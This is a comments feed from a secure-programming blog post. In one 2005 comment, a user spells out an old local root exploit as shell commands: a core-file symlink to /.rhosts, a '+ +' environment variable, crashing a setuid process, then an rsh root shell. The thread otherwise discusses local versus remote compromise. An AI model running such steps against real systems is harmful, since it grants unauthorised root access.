tag:blogger.com,1999:blog-11871043.post111354853764072309..comments2016-07-11T00:26:26.011-07:00Comments on Secure Programming: The temporary one!Unknownnoreply@blogger.comBlogger4125tag:blogger.com,1999:blog-11871043.post-1113885060096680192005-04-18T21:31:00.000-07:002005-04-18T21:31:00.000-07:00In the similar manner you can exploit the code giv...In the similar manner you can exploit the code given in problem.SGhttps://www.blogger.com/profile/02698999020486949764noreply@blogger.comtag:blogger.com,1999:blog-11871043.post-1113884993439022382005-04-18T21:29:00.000-07:002005-04-18T21:29:00.000-07:00I dont think we can control the behavior of printf...I dont think we can control the behavior of printf.<BR/><BR/>You remember an old trick:<BR/>(Earlier all cores dumped by applications having suid as root were owned by root.)<BR/><BR/>$ln -s /.rhosts core<BR/>$BOB42="<BR/><BR/>+ +<BR/><BR/>"<BR/>$export BOB42<BR/><BR/>Now get the core dumped by killing some suid root process for example 'ping'. <BR/>And here is your chocolate:<BR/>$rsh -l root localhost /bin/sh -i<BR/><BR/>Njoy.SGhttps://www.blogger.com/profile/02698999020486949764noreply@blogger.comtag:blogger.com,1999:blog-11871043.post-1113818478837636842005-04-18T03:01:00.000-07:002005-04-18T03:01:00.000-07:00Very true.It may be a local compromise but not a r...Very true.<BR/>It may be a local compromise but not a remote one.<BR/><BR/>--Alpha0SGhttps://www.blogger.com/profile/02698999020486949764noreply@blogger.comtag:blogger.com,1999:blog-11871043.post-1113818459087362672005-04-18T03:00:00.000-07:002005-04-18T03:00:00.000-07:00This comment has been removed by a blog administrator.SGhttps://www.blogger.com/profile/02698999020486949764noreply@blogger.com